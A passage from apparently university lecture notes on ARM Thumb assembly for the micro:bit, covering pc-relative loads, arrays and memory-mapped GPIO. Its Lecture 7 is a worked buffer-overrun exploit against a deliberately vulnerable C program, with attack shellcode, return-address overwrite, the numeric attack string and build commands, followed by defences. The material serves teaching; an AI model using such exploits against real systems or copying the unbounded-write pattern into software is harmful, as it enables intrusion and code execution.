    str r2, [r1]

the addressing mode [r1] uses the value in r1 as the address, and is just an abbreviation for [r1, #0]. Now the problem is this: how can we get the constant address 0x20000234 into a register? We can't write

    movs r1, #0x20000234     @ Wrong!

because that huge constant won't fit in the eight-bit field provided in an immediate move instruction. In Thumb code, the solution is to place the constant somewhere in memory just after the code for the increment function (typically, that means placing it in ROM), then use a pc-relative load instruction to move it into a register.

    ldr r1, [pc, #36]
    ...                A
    ...                |
    ...              36 bytes
    ...                |
    ...                V
    .word 0x20000234

The idea is that, although the constant 0x20000234 won't fit in an instruction, the offset shown here as 36 between the ldr instruction and the place that value sits in the ROM is small enough to fit in the (generously sized) field of the ldr instruction. The effect of the C statement count = count + n can therefore be achieved in four instructions:

    ldr r1, [pc, #36]
    ldr r2, [r1]
    adds r2, r2, r0
    str r2, [r1]

plus, of course, arranging that the constant 0x20000234 appears in memory in the expected place. Though we use count twice, once to load and once to store, we only need to put its address in a register once. Although this scheme works well when the program runs, it's a bit difficult to set up when we write the program. We don't want to have to count the offset 36 between the first ldr instruction and the place the constant sits in the ROM, or to update it every time we slightly change the program; also, we don't want to have to assign addresses like 0x20000234 manually and make sure that different variables get different addresses. When writing a program, we will get the assembler and linker to help with these details.

Context

If you are familiar with assembly language programming for Intel chips, it may seem disappointing that the ARM needs four instructions to increment a global variable, when the x86 can do it in just one, written incl counter using unix conventions. When comparing the two machines, we should bear in mind that most implementations of the x86 instruction set, execution of the instruction will be broken down into multiple stages, first decoding the 6-byte instruction and extracting the 32-bit address from it, then fetching from that address, incrementing, and storing back into the same address. The difference between the two machines relates less to how the operation is executed, and more to how the sequence of actions is encoded as instructions.

First, we'll introduce a name counter for the global variable. In the assembly language program, the value counter will be the address of the variable. Instead of writing

    ldr r1, [pc, #36]

and placing the constant manually in the right place, the assembler lets us write

    ldr r1, =counter

and looks after finding a place for the constant and filling in the required offset, then translates the instuction as a pc-relative load. The assembler keeps a list of values that have been used in such ldr instructions, and whenever it can do so, outputs the list and fills in the offsets in instructions that refer to the values. It always outputs constants at the end of the assembly language file, and also in places where we give a .pool or .ltorg directive; it is safe to do so between subroutines, and also in other places that can never be reached by the program, such as immediately after an unconditional branch and before an ensuing label. With smallish fragments of assembly language, there's no need to do anything, provided the offset range of the pc-relative load instructions is large enough to reach to the end of the file.

An important detail that's dealt with for us: in Thumb code, when an instruction like ldr, r1, [pc, #36] is executed, the value that is used for pc is the address of the instruction plus 4, because pipelining means that the processor will already have fetched the next instruction and incremented the PC beyond it by the time this instruction is executed. In the pc-relative ldr instruction, this pc value is then rounded down to a multiple of 4 before the constant 36 (always itself a multiple of 4) is added to it. The assembler takes care of these details for us, and the rules only become apparent if we look at the binary machine code, or if we try (as we will next term) to design an implementation of the instruction set.

As well as placing the 32-bit constant appropriately, we also want to place the counter variable itself in RAM without having to assign its address for ourselves, and be sure that the storage it uses does not overlap with other variables. To do this, we must add the following lines to the end of the assembly language file.

    .bss          @ Place the following in RAM
    .balign 4     @ Align to a multiple of 4 bytes
counter:
    .word 0       @ Allocate a 4-byte word of memory

The directives written here first (.bss) direct the assembler to place the variable in the BSS segment, which the linker will assign to RAM, and the startup code will initialise with zeroes. This directive complements the .text directive that came before the increment subroutine: that code goes in the text segment and is placed by the linker in ROM, and this data is placed in RAM.

The next directive (.balign 4) pads the BSS segment with zero bytes until its length is a multiple of 4, so as to be sure that the variable is aligned on a 4-byte boundary. Such alignment directives on unix-based systems have a vexed history, because the directive .align n sometimes aligns on an n-byte boundary, and sometimes on a 2n-byte boundary depending on the target processor and sometimes even on the format of object file that is being used. The Gnu assembler provides a pair of unambiguous directives .balign n and .p2align n that remove this doubt, and it's best to use them in all new programs.

Now we can allocate space for the variable, by first placing a label (counter:), then assembling a 4-byte word with value zero (.word 0). Taken together, these four lines of assembly language cause the assembler to output requests to the linker to reserve a 4-byte space in RAM, ensuring it is aligned on a 4-byte boundary, and to put its address into the constant table from where it can be accessed by the code for the increment subroutine. The lines can be put either before or after the code for the subroutine, because the assembler doesn't generally mind about names (like counter here) being used before they are defined.

Disassembling the object file that results from the code shown here reveals that the linker has placed the increment subroutine at address 0x150 and the counter variable at address 0x20000004.

00000150 <increment>:
 150:   4902            ldr     r1, [pc, #8]    ; (15c <increment+0xc>)
 152:   680a            ldr     r2, [r1, #0]
 154:   1812            adds    r2, r2, r0
 156:   600a            str     r2, [r1, #0]
 158:   4770            bx      lr
 15a:   0000            .short  0x0000
 15c:   20000004        .word   0x20000004

The pc-relative load instruction at address 0x150 contains an offset of 8, which is correct because 0x150 + 4 + 8 = 0x15c, and the constant is placed at that address. At 0x15a is two bytes of padding, included so that the constant is aligned on a 4-byte boundary as it should be, followed by the constant itself, whose value is the address of the variable in the BSS segment.

Arrays

[6.5] Individual global or local variables are useful, but more useful still is the ability to access elements of an array by indexing. That entails begin able to calculate the address of the location accessed by a load or store instruction. The address of the i 'th element a[i ] of an array a is base + i * elsize, where base is the starting address of the array and elsize is the size of one element.

Array indexing

The ARM helps with this calculation by providing a form of the ldr and str instructions (an addressing mode) were the memory address is computed as the sum of two registers, as in ldr r0, [r1, r2]. This instruction adds together the values in r1 and r2 to form an address, loads the 4-byte word from this address, and puts the value in r0. Typically, r1 might contain the base address of an array, and r2 might contain 4 times the index, usually computed by means of a left-shift instruction lsls r2, r2, #2.

We can experiment with these instructions by building a "bank account" program that maintains an array of integers, with a functon func(x, y) that we could define in C like this:

int account[10];

int func(int x, int y)
{
   ​int z = account[x] + y;
   ​account[x] = z;
   ​return z;
}

Given an account number x and an amount y, this function increases the balance of account x by y and returns the new balance. (We could write the entire routine body as return account[x] += y, but that's more obscure, and a good C compiler will produce identical code either way.)

Let's write the same thing in assembly language. We will need to allocate space for the array, 40 bytes aligned on a 4-byte boundary and allocate in the BSS segment.

   ​.bss                @ Allocate space in the uninitialised data segment
   ​.balign 4           @ Pad to a 4-byte boundary
account:
   ​.space 40           @ Allocate 40 bytes

Now here's the function itself.

   ​.text               @ Back to the text segment
   ​.global func
   ​.thumb_func
func:
   ​ldr r3, =account    @ Base address of array in r3
   ​lsls r2, r0, #2     @ Offset of element x
   ​ldr r0, [r3, r2]    @ Fetch the element
   ​adds r0, r0, r1     @ Increment by y
   ​str r0, [r3, r2]    @ Save the new value
   ​bx lr               @ New value is also result

Some things to note:

  • The address of account is a large constant, unknown until the program is linked – just like the address of the count variable in the previous example. We can get it in a register using the ldr = method: this gives us the address of the array element account[0], not yet its value.
  • To access the element account[x], we need to compute the offset 4*x in bytes from the beginning of the array. We can multiply by four using a left shift.
  • The address of an array element is obtained by adding base and offset, using the reg+reg addressing mode. It's cheaper to do this calculation twice, once in the ldr and once in the str, than to compute it once into a register, which would take an extra instruction.
  • Both base and offset can be shared between the two access to the array. A compiler would spot this as part of its optimisation of the program, and would like us express this insight by setting r3 and r2 once and using each twice.

The example uses a global array that persists from one invocation of func to the next – otherwise the program would be pointless. It's also possible to allocate a local array in the stack frame of a procedure, so that it lives only as long as an invocation of the procedure. To allocate space for it, subtract a suitably large constant from the stack pointer on entry, and add it back on exit. There's a useful form of add instruction that adds the sp value and a moderately sized constant and puts the result in a register:

add r0, sp, #32

This is useful for computing the base address of the array into a register, and from there the process of indexing is the same as for a global array. It's up to us to plan the layout of the stack frame, though – something that is done by the compiler for programs written in C.

Other load and store instructions

The instructions ldr and str are the most frequently used, because they transfer a quantity as wide as a register to or from memory. Next in importance are the instructions ldrb and strb that transfer single characters. For example, the instruction

ldrb r0, [r1]

takes the single character in memory whose address is in r1 (the address need not be a multiple of 4), and transfers it to the least significant byte of r0, replacing the other three bytes with zeroes. As a complement, the instruction

strb r0, [r1]

takes the least significant byte of r0, ignoring anything held in the other three bytes, and stores it at the address found in r1. Both these instructions exist for Thumb code with the same reg+reg and reg+const addressing modes as the ldr and str instructions. There are also instructions ldrh and strh that load and store two-byte halfwords in the same way.

In addition to the ldrb instruction that loads an unsigned byte, padding it from 8 to 32 bits with zeroes, there is also an instruction ldrsb for loading a signed byte and replicating bit 7 into the upper 24 bits of the result. Similarly, there is an instruction ldrsh for loading signed halfwords. These instructions are less useful than the others, so they exist in Thumb code only with the reg+reg addressing mode; on the rare occasions that the reg+const addressing mode would be useful, the same effect can be obtained by following an unsigned load with an explicit sign extension sxtb or sxth. There is no need for 'signed store' instructions, because no matter whether the value is considered as signed or unsigned, the store instruction takes the bottom 8 or 16 bits of the value on the register and stores them into memory.

Questions

Does the program always have to be in the Flash ROM and variables in RAM, or can we mix them?

On the micro:bit (and other ARM-based microcontrollers) both ROM and RAM form a single address space, with the two kinds of memory occupying different address ranges: 0 to 0x3ffff for ROM and 0x2000 0000 to 0x2000 3fff for RAM. Although it's convenient to put all the code for a program in ROM, so that it survives times when the chip is powered down, it's perfectly possible for the processor to execute code that is stored in RAM – perhaps generated dynamically as the program runs, or downloaded from an external source and held in RAM temporarily. Still more usefully, the processor can access data held in ROM, such as string constants, or tables of constant data that are particularly useful in embedded programming, and it can use the same load instructions to do so as it uses to access data in the RAM, just with different addresses. What you can't do, of course, is have data that changes held in the ROM, and modify it using ordinary store instructions. Executing a store instruction with an address in ROM space either results in no change, or leads to an exception and the Seven Stars of Death – I wonder which?

It is possible for the contents of ROM to change under program control, so that (for example) embedded systems can load new versions of their sofware 'over the air'. For that to happen, the ROM is accessed like an I/O device via the Non Volatile Memory Controller (NVMC), and not using ordinary instructions. It's usually not possible to be running a program held in ROM at the same time as the ROM is being overwritten, so the usual practice is to copy the code that controls the writing into RAM and execute it from there. This is not quite what happens when we download a program to the micro:bit: instead, the second processor on the board takes control of the main processor via its debug interface, and by that means is able to make the NVMC load a program into the ROM.

Lecture 7

Lecture 7 – Buffer overrun attacks

A hacker's guide.

The victim

One day, an Oxford undergraduate was conscientiously doing his IP1 practical, using C and the micro:bit instead of Scala and some bloated AMD64 machine with gigabytes of RAM. Here is the code that he wrote:

/* getnum -- read a line of input and convert to a number */
int getnum(void)
{
    char buf[64];
    getline(buf);
    return atoi(buf);
}

void init(void)
{
    int n = 0, total;
    int data[10];

    serial_init();

    printf("Enter numbers, 0 to finish\n");
    while (1) {
        int x = getnum();
        if (x == 0) break;
        data[n++] = x;
    }

    total = 0;
    for (int i = 0; i < n; i++)
        total += data[i];
    
    printf("Total = %d\n", total);    
}   

That doesn't look too bad, does it? There's a subroutine getnum that reads a line of input and converts it into a number, and the main program uses it to read a sequence of numbers and store them in an array. Finally, the program adds together all of the numbers and prints the total. But already this program contains a horrendous bug, which will allow us, by feeding it carefully crafted input, to subvert it and run any code that we like. To show our power, we will force the program to print the string PWNED!.

The flaw in the program is that it doesn't check that the input contains at most 10 numbers, and continues to accept and store numbers even when the array is full. It is this weakness we shall exploit.

Context

This sort of sloppy programming is very common in C. It does little damage if the program is quickly written, used only locally, and quickly discarded. In other contexts, as we'll see, more care is very much needed to avoid security problems.

There is actually another, more insidious, problem in the program, and that is the interface of the routine getline, which takes as a parameter the address of a character array to store the line, but has no what of knowing how big that array is, and so cannot guard against overflowing it. Routines in the C library such as gets – the same as getline here – are rightly deprecated for their unsafety. There's an alternative function fgets(buf, n, fp) that can read from an arbitrary file fp, not just the standard input, but crucially also accepts the maximum number of characters n that will fit in buf.

Mounting the attack

Used ordinarily, the program fulfils its purpose.

Enter numbers, ending with 0
> 123
> 456
> 7
> 0
Total = 586

After printing the total, the program ends, and we must press reset to use it again. But now let's try another sequence of 14 numbers.

Enter numbers, ending with 0
> -1610370930
> 1200113921
> 59387
> 1217
> 1262698824
> 555828293
> 32
> 1
> 1
> 1
> 1
> 1
> 1
> 536887217
> 0

As you will see, the program runs hayware, printing the same message over and over again. (In the lecture, I used a helper program squirt running on the host computer to automate typing in the numbers – but given enough patience it can be done by hand.)

Analysing the attack

So what are those 14 magic numbers, and how were they determined?

First, we notice that there are 14 numbers, and the buffer declared locally in init has space for only 10 numbers. The first 10 numbers that are input fill up the data array, and the remaining four are written by the program into the space beyond the array, overwriting whatever the program was storing there. To understand what is overwritten, and how this leads to subversion of the program, we need to look at the layout of init's stack frame.

    +--------------------------------+
    | Return address                 |
    +--------------------------------+
    | Saved R5 value                 |
    +--------------------------------+
    | Saved R4 value                 |
    +--------------------------------+
    | One word of padding            |
    +--------------------------------+
    |                                |
    | 10 words for data array        |
sp: |                                |
    +--------------------------------+

We can deduce the layout of init's frame by looking at its code, obtained by disassembling the program. The code begins like this:

00000224 <init>:
 224:   b530            push    {r4, r5, lr}
 226:   b08b            sub     sp, #44 ; 0x2c
 228:   f7ff ff4a       bl      c0 <serial_init>
 22c:   480d            ldr     r0, [pc, #52]   ; (264 <init+0x40>)
 22e:   f000 f947       bl      4c0 <printf>
 232:   2400            movs    r4, #0
 234:   f7ff ffec       bl      210 <getnum>
 238:   2800            cmp     r0, #0
 23a:   d004            beq.n   246 <init+0x22>
 23c:   00a3            lsls    r3, r4, #2
 23e:   466a            mov     r2, sp
 240:   5098            str     r0, [r3, r2]
 242:   3401            adds    r4, #1
 244:   e7f6            b.n     234 <init+0x10>

The function begins by saving three registers, then subtracting 44 from the stack pointer, enough space for the 40-byte data array, plus four bytes of padding that are included so as to keep the stack pointer a multiple of eight in obedience to the ARM calling convention.

The local variable n lives in register r4, and later in the function, the statement data[n++] = x is translated into the four instructions starting with lsls at address 0x23c: first r3 is set to 4*n, then r2 is set to the value of sp, and x, currently resident in r0 is stored into an address formed by adding r2 and r3, just as we would expect if the array begins at the stack pointer as the picture shows.

Is it fair to disassemble the target program and use this information to mount our attack? Yes, of course: in real life, we might be attacking a particular release of [a popular web browser], and we can download the code and study it to our heart's content, EULA notwithstanding.

Ok, we will make our attack string contain 10 integers to fill up the buffer, another three integers to overwrite the next three words of the stack, and then one more integer that will overwrite the return address of init with a value of our choosing. By doing this, we can arrange that when init returns, it will be to a place that we can control. We'll choose that place to be the buffer itself, and arrange that the data put in the buffer is the code we'd like to run. But where will the buffer be in memory? We can find that out by running the program on a test machine with the debugger, stopping it in init, and writing down the value of the stack pointer. That will allow us to calculate the address of each part of our attack string once it is copied into the data array by the victim. In a more complicated program, different calls to init might be made in different contexts, and there may be several possible values for the stack pointer; here there is only one.

The layout we plan for the attack string is like this:

40 bytes of code
Another 12 bytes of padding
Address of the code

There's one more piece of information we need to formulate the attack string, and that's the address of the subroutine printf, which we can use to print our message (and a ransom note). We can find that by disassembling the program or by looking in the map file output by the linker. If our target is open source, we can get all this information freely; if not, we might need to poke about a bit more with a disassembler, but it's not rocket science.

After the stack frame of init has been overwritten by the input loop, the rest of init runs as usual: the total of the 14 numbers we have input is computed and printed. Then init returns to our chosen return address, and the code we placed in the buffer starts to run.

Context

The layout of the stack frame for init is typical of many machines. Details will differ: for example, we can expect the return address to appear at different offsets from the start of the buffer. What most buffer overrun attacks have in common is that the return address of a subroutine can be overwritten by overflowing a buffer embedded in the stack frame.

Building a binary

We could piece together the attack string byte by byte, hardware manual in hand. But it's neater to use the assembler: here's the assembly language source for what we want, including the addresses we determined earlier:

    .equ printf, 0x4c0      @ Address of printf
    .equ frame, 0x20003fb0  @ Captured stack pointer value in init

    .text
attack:
    sub sp, #56             @  0: Reserve stack space again
again:
    adr r0, message         @  2: Address of our message
    ldr r1, =printf+1       @  4: Absolute address for call
    blx r1                  @  6: Call printf
    b again                 @  8: Spin forever
    .pool                   @ 12: constant pool
message:
    .asciz "HACKED!! "      @ 16: string -- 10 bytes
    .balign 4, 0            @ pad to 28 bytes
    .word 1, 1, 1, 1        @ 28: fill up to 44 bytes
    .word 1, 1              @ 44: Saved r4, r5
    .word frame+1           @ 52: Faked return address
                            @ Total size 56

By the time this code is reached, init will have deallocated the stack space that was used for the buffer, so the first task is to adjust the stack pointer, so that when we later call printf, its stack frame will not overwrite our code. Then there is a call that passes the message to printf, for simplicity calling it by first putting its absolute address in a register; the +1 is to mark it as Thumb code.[1] Then the code enters an infinite loop while we wait for the ransom to be sent – in Bitcoin, naturally.

Some details to dispel any mystery:

  • The adr instruction assembles into an instruction add r0, pc, #n that sets r0 to the address of the message: the assembler determines the value of n.
  • The directive .pool places the constant printf+1 here in memory and fixes up the earlier ldr = instruction to refer to it.
  • The directive .asciz stores the characters of our message, terminated C-style with a zero byte.
  • The directive .align 5, 0 pads the program with zero bytes (0) until its size is a multiple of 32 = 25.
  • Each .word directive contributes a four-byte word to the output of the assembler.
  • The .equ directives give the numeric value of the symbols printf and frame, obtained in earlier experiments.
  • We use a blx reg instruction instead of bl label just because it's marginally inconvenient to determine the displacement for bl, and an absolute address is easier to deal with.

There's a makefile that automates the process of building the demonstration. First, we can assemble the file attack.s into an object file attack.o.

arm-none-eabi-as -mcpu=cortex-m0 -mthumb attack.s -o attack.o

Next, we use objcopy to turn the .o file into a binary image.

arm-none-eabi-objcopy -O binary attack.o attack.bin

Then we can use the (slightly misnamed) hexdump utility to format the binary data as a sequence of decimal integers.

hexdump -v -e '/4 "%d\n"' attack.bin >attack

The file attack then contains the ten lines shown earlier as input to the milk bill program. There's a little program squirt that tuns on the host and outputs the text like keystrokes to the serial interface of the micro:bit.

Disassembling the file attack.o shows the correspondence between the input to the assembler and the 14 integers that make up the attack string.

00000000 <attack>:
   0:   b08e            sub     sp, #56 ; 0x38
   2:   a003            add     r0, pc, #12     ; (adr r0, 10 <message>)
   4:   4901            ldr     r1, [pc, #4]    ; (c <attack+0xc>)
   6:   4788            blx     r1
   8:   e7fb            b.n     2 <attack+0x2>
   a:   0000            .short  0x0000
   c:   000004c1        .word   0x000004c1

00000010 <message>:
  10:   4b434148        .word   0x4b434148
  14:   21214445        .word   0x21214445
  18:   00000020        .word   0x00000020
  1c:   00000001        .word   0x00000001
  20:   00000001        .word   0x00000001
  24:   00000001        .word   0x00000001
  28:   00000001        .word   0x00000001
  2c:   00000001        .word   0x00000001
  30:   00000001        .word   0x00000001
  34:   20003fb1        .word   0x20003fb1

For example, the first integer is -1610370930, and that is the (signed) value of the bitstring 0xa003b08e.

It's possible to use the debugger to capture the precise moment when the pc jumps to an unexpected value. Another page has a (manual) script to follow.

Defence against the dark arts

This example shows just how easy it is to write code with accidental vulnerabilities. There are many things that can be done to prevent such vulnerabilities from being exposed.

  1. We could use a programming language that supports checking of array bounds, and makes it difficult to pass around the addresses of buffers without also passing and checking their size.
  2. This attack depends on executing code that has been received as data: in the example, that code is stored in the region of memory that is used for the stack. On machines more sophisticated than the micro:bit, it's often possible to forbid executing code from anywhere but the code segment of the program.
  3. Even microcontrollers that have separate address spaces for program and data make it difficult to accidentally execute data as instructions. Nevertheless, there has to be some way of doing it, or such microcontrollers would not be able to update their own firmware under program control, and that is a useful feature.
  4. The attack depended on knowing a couple of addresses – the address of the getnum stack frame and the address of the existing printf subroutine. By randomising the layout of memory for each run of the program, it can be made more difficult to predict where such things will be found.

Linux has some at least of these defences enabled by default and repeating the attack there is rather more difficult.

Lecture 8


  1. That is to say, the blx r1 instruction on bigger ARM processors is capable of switching between Native ARM and Thumb modes, according to the least significant bit in the register r1 – that is the significance of the x in the mnemonic blx. The function printf is in Thumb code, so even on the Cortex-M0, we must carefully keep the processor in Thumb mode when calling it: hence the +1. For the same reason, the return address we plant in place of getnum's original return address also has a +1.

Lecture 8 – Introducing I/O

Memory-mapped I/O. GPIO. Multiplexed LED display.

We now move beyond the core of the processor (designed by ARM) to look at I/O devices (designed by Nordic Semiconductor and documented in their separate datasheet). The simplest I/O device is called GPIO (General Purpose Input/Output) and allows 32 pins of the chip to be individually configured either as outputs, producing a voltage under control of the program, or as inputs, so that the program can sense whether an externally applied voltage on the pin is high or low. On the micro:bit, we can put the GPIO pins to immediate use because some of them are connected to 25 LEDs and two push-buttons.

Basics of LEDs

Basics of LEDs

[8.1] LEDs, like most semiconductor diodes, conduct in only one direction, shown by the arrow on the circuit symbol. Thus, the circuit on the right will produce no light, whereas the circuit on the left does light the LED. It is necessary to connect a resistor in series with the LED in order to control the current. For a 3V supply, about 2V will be dropped across the LED, the remaining 1V will be dropped across the resistor, and a resistor of 220Ω will give a sensible current of 4.5mA through resistor and LED. It doesn't matter which side of the LED the resistor is connected, so long as it is there.

A matrix of LEDs

[8.2] A single GPIO pin can control an LED connected (with a series resistor) between the pin and ground: this is useful as a debugging aid in many prototypes. Alternatively, an LED and resistor could be connected between two GPIO pins A and B, and would light only if A is high and B is low. This is a useless idea, until we see that multiple LEDs can be connected in this way, as in the picture at the right. With these connections, the fifth LED from the left will light if B is high and Y is low; we can prevent the other LEDs from lighting by setting A low and X and Y high. In fact we can light any single LED by setting the pins appropriately, and we can light one group of three LEDs or the other in any pattern by setting either A or B high, and choosing to set X, Y and Z low in a pattern that corresponds to the LEDs we want to light. There are three series resistors at X, Y and Z that to control the current through individual LEDs in each group of three. To show a pattern on all six LEDs, we will have to show the two groups alternately, changing between them quickly enough that the flickering is invisible. This "matrix" of six LEDs is the smallest that gives any saving over wiring the LEDs to individual I/O pins, since it uses five pins rather than six.

[8.3] On the micro:bit, though they are arranged physically in a 5x5 array, the LEDs are wired as three 'rows' of nine LEDs each (with two missing), with a documented correspondence to the physical layout.

Schematic of LEDs and buttons

Bits 4–12 of the GPIO register are used for the column lines, and bits 13–15 for the row lines.

0000|0000|0000|0000|0000|R3 R2 R1 C9|C8 C7 C6 C5|C4 C3 C2 C1|0000

Context

Ad-hoc matrices of LEDs like the one on the micro:bit seem a bit amateurish (though fun). But the idea of LEDs addressed as a matrix is very common, because the 7-segment LED displays seen everywhere are usually built in this way. Each individual digit has seven (or eight with the decimal point) individual anodes and a common cathode. In a multidigit display, we can connect together corresponding anodes from each digit, and connect these through series resistors to eight GPIO pins. The common cathode for each display also gets its own GPIO pin, so the total number of pins needed is 8 plus the number of digits. In cheapo designs, the display can be multiplexed (as on the micro:bit) by bit-banging in software. But there are also special-purpose LED driver chips like the HT16K33 that do the same job in hardware, reducing the load on the processor.

Device registers

[8.4] On the ARM, I/O devices appear as special storage locations (called device registers) in the same address space as RAM and Flash. Loading from or storing to one of these locations gives information about the external world, or has a side-effect that is externally visible. For example, there are two storage locations, one at address 0x50000514 that we shall call GPIO_DIR, and another at address 0x50000504 that we shall call GPIO_OUT. Storing a bit pattern in GPIO_DIR lets us configure the individual pins as inputs or outputs, and storing to GPIO_OUT sets the voltage on each output pin to high (if 1) or low (if 0). We can set these locations like any other, using an str instruction with a specific address; so to set the GPIO_DIR register to the constant 0xfff0 (thereby configuring 12 of the GPIO pins as outputs), we can use the code

ldr r0, =0x50000514
ldr r1, =0xfff0
str r1, [r0]

In a C program, things are a bit easier. There's a header file hardware.h that contains definitions of all the device registers we shall use in the course; including it allows us to use GPIO_DIR in a program to denote the device register with address 0x50000514, and we can store the constant 0xfff0 in that register just by writing

GPIO_DIR = 0xfff0;

The compiler translates this into exactly the code shown earlier. You need not delve into the details except to satisfy your curiosity.

The GPIO_DIR register has a row of latches that remember whether each GPIO pin is configured as an input (0) or an output (1), and the GPIO_OUT register has a row of latches that remember the output voltage that has been selected for each pin, either low (0) or high (1). Internally, the same electronic signals that for an ordinary RAM location would cause the RAM to update the contents of a word in this case sets the latches and therefore the output directions or values. (On other architectures such as the x86, I/O devices usually do not appear as storage locations accessed with the usual load and store instructions, but there are separate in and out instructions, and effectively a separate address space.) To use the LEDs, we first need to configure the GPIO port so that the relevant bits are outputs: this is achieved with the assignment GPIO_DIR = 0xfff0.

To light a single LED, we should connect its row to +3.3V and its column to 0V. Then current can flow through from the row pin, through the LED and its series resistor, to the column pin, and the LED will light up. The series resistor limits the current that can flow through the LED to a value that is safe both for the LED and the microcontroller pins that are connected to it. If we set the other row lines, apart from the one belonging to our chosen LED, to 0V and the other column lines to +3.3V, then other LEDs in the same row or column as the lit LED will have their anode and cathode at the same potential, and will carry no current. LEDs that are not in the same row or column will have their anode and 0V and their cathode at +3.3V, so they will be reverse biased, and they also will carry no current, and only the one chosen LED will light. So to light the middle LED in the 5x5 array, which is electrically in row 2 and column 3, we set @GPIO_OUT like this:

...   |R3 R2 R1 C9 |C8 C7 C6 C5 |C4 C3 C2 C1 |
...00 | 0  1  0  1 | 1  1  1  1 | 1  0  1  1 | 0000
             5           f             b         0

The needed assignment is GPIO_OUT = 0x5fb0.

Multiplexing

[8.5] We could light all 25 LEDs at once by setting all the column lines high and all the rows low – 0xe000. Each individual LED would be a bit dimmer, because the current available in each column (set by the 220Ω series resistor) would be shared among three LEDs. For most patterns, however, we will need to multiplex the three rows, lighting the correct LEDs in each row in turn, and pausing a bit before moving on the next row. If the pauses are short enough, persistence of vision will make it seem that all the LEDs making up the pattern are lit together. For example, a heart pattern

. X . X .
X X X X X
X X X X X
. X X X .
. . X . .

is made by lighting LEDs 5, 6, 7, 9 in row 1, LEDs 1, 2, 3, 4, 5 in row 2, and LEDs 1, 4, 5, 6, 7, 8, 9 in row 3, so we want to use the bit patterns

0010 1000 1111 0000 = 0x28f0
0101 1110 0000 0000 = 0x5e00
1000 0000 0110 0000 = 0x8060

in succession.

[8.6] The code might be

while (1) {
    GPIO_OUT = 0x28f0;
    delay(JIFFY);
    GPIO_OUT = 0x5e00;
    delay(JIFFY);
    GPIO_OUT = 0x8060;
    delay(JIFFY);
}

A suitable value of JIFFY would be 5000, for a delay of 5 milliseconds expressed in units of 1 microsecond. Then an iteration of the loop will take just about 15 milliseconds, or about 66 frames per second, fast enough that no flickering will be visible.

[8.7] Displaying a single pattern is all very well, but if we want to display different patterns at different times, then we should not write separate code (with embedded hexadecimal constants) for each pattern, but rather represent the patterns as data, an array of three integers. We can create patterns by declaring initialised arrays like this:

static const unsigned heart[] = {
    0x28f0, 0x5e00, 0x8060
};

The static makes this a variable visible only from the file of code where it is declared, and the const makes it read-only, so that the C compiler and linker can put it in ROM instead of using (three words of) precious RAM space.

Then we can write a function like this that displays an arbitrary pattern, repeating the three rows n times:

/* show -- display three rows of a picture n times */
void show(const unsigned *img, int n) {
    while (n > 0) {
        // Takes 15msec per iteration
        for (int p = 0; p < 3; p++) {
            GPIO_OUT = img[p];
            delay(JIFFY);
        }
        n--;
    }
}

To make things simpler for the application programmer, we could also think about automating the process of deriving the hexadecimal constants, so that another pattern could be defined like this:

static const unsigned hollow[] =
    IMAGE(0,1,0,1,0,
          1,0,1,0,1,
          1,0,0,0,1,
          0,1,0,1,0,
          0,0,1,0,0);

I'll leave that as something for C experts to investigate!

What about those delays? The easiest way of implementing them is to write a loop that counts down from some constant, creating a predictable delay. With a bit of care, we can write a loop that takes 500ns per iteration, to do delay d microseconds we need to make it iterate 2d times.

void delay(unsigned usec) {
    unsigned n = 2*usec;
    while (n > 0) {
        nop(); nop(); nop();
        n--;
    }
}

Looking at the compiler output (and timing it with a scope) reveals that the loop takes 5 cycles per iteration without the nop instructions, so adding three of them brings it up to 8 cycles per iteration, or 500nsec at 16MHz. Delays were commonly implemented like this in old-fashioned MS-DOS games, and the games become unplayable when they were moved to a machine with a faster clock than the original PC. The same thing might happen to us if next year's micro:bit has a faster clock, or if improvements in the C compiler were to affect its translation of the loop.

A more serious problem with delay loops is that they force the machine to do nothing useful during the delay. That is a problem we will solve later – by using a hardware timer in place of the delay loop, then making the program interrupt controlled, and ultimately by introducing an operating system that is able to schedule other processes to run while waiting for the timer to fire.

The push-buttons on the micro:bit are connected to other GPIO pins that can be configured as inputs. For various reasons, the buttons are wired with pull-up resistors as shown in the schematic above, so that the input signal to the chip is +3.3V if the button is not pushed (a logical 1), and drops to 0V (a logical 0) when it is pushed. Lab 2 begins with a program (an electronic Valentine's card) that shows a beating heart pattern, and asks you enhance it so that pressing the buttons changes pattern shown on the display.

Pushbuttons

Pushbutton with pullup resistor

The micro:bit has two 'user' pushbuttons on the front of the board (in addition to the reset button on the back). These are connected to a microcontroller pin using a pull-up resistor, as shown in the circuit diagram at the right, so that the pin sees a voltage of +3.3V when the button is released, and 0V when it is pressed.

The two pins that are connected to buttons are identified by the constants BUTTON_A and BUTTON_B defined in hardware.h. In order to use the buttons in a program, we must first configure those pins so they are connected as inputs. There's an array of I/O registers called GPIO_PINCNF, with one element to control the configuration of each GPIO pin. To connect a pin for input, we must set the GPIO_PINCNF_INPUT field of the relevant element to the value GPIO_INPUT_Connect, like this:

SET_FIELD(GPIO_PINCNF[BUTTON_A], GPIO_PINCNF_INPUT, GPIO_INPUT_Connect);

Since the power-up values of all other fields in these registers is zero, and the value of GPIO_PINCNF_Connect is also zero, it's more common to do this job with the simpler assignment

GPIO_PINCNF[BUTTON_A] = 0;

Once this configuration has been done (for BUTTON_B also), the program can discover the state of the buttons by reading the register GPIO_IN and looking at the relevant bits, like this:

unsigned x = GPIO_IN;
if (GET_BIT(x, BUTTON_A) == 0 || GET_BIT(x, BUTTON_B) == 0) {
    // A button is pressed
}

You can easily design variants of this code for yourself, for example to do different things depending on which button is pressed.

Physical pushbuttons tend to suffer from the problem that the signal changes state several times over a period of several milliseconds after the button is pressed or released, a phenomenon called contact bounce. If software is going to treat a button press as an event rather than a state (such as counting the number of button presses), then it's wise to implement a scheme where contact bounce is filtered out, such as not reacting to a press until the button has produced the same value in several samples taken several milliseconds apart.

Questions

What does the assignment statement GPIO_OUT = 0x4000 look like in assembly language?

GPIO_OUT is a macro defined in hardware.h as (* (volatile unsigned *) 0x50000504). This definition exploits the weak type system of C, and denotes an unsigned variable at the numeric address 0x50000504, a constant obtained from the nRF51822 datasheet. The volatile keyword amounts to saying to the C compiler, "Please just do any assignments immediately: don't try to be clever and optimise in any way, such as combining one assignment with a later one that targets the same address."

To achieve the same effect in assembly language, we need an str instruction for the assignment. But both the address being assigned to and the value being assigned are large constants, so we'll need to put the constants in registers first, using the pc-relative load instructions for which "ldr =" is a shorthand. So suitable code is

ldr r0, =0x4000
ldr r1, =0x50000504
str r0, [r1]

Alternatively, we might put the address of the whole GPIO device in a register and address the individual device registers at small offsets from that base address.

ldr r0, =0x4000
